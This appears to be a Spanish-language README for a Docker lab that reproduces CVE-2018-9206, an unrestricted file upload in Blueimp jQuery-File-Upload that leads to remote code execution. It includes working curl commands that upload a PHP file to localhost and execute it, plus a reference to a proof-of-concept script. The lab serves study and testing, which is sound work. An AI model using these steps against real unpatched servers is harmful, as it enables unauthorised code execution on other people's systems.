
Entorno de laboratorio basado en Docker para CVE-2018-9206 (subida de archivos sin restricciones a RCE en Blueimp jQuery-File-Upload) con scripts de PoC y comandos de validación.
Entorno Docker vulnerable para CVE-2018-9206 - Carga de archivos sin restricciones en Blueimp jQuery-File-Upload <= 9.22.0.
docker compose up -d --build
Aplicación disponible en: http://localhost:8888/jQuery-File-Upload/
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
-F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'
# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED
O ejecuta el script PoC:
./scripts/poc.sh
docker compose down -v
| Campo | Valor |
|---|---|
| CVE | CVE-2018-9206 |
| Producto | Blueimp jQuery-File-Upload |
| Versión | 9.22.0 |
| Tipo | Carga de archivos sin restricciones → RCE |
| CVSS | 9.8 (Crítico) |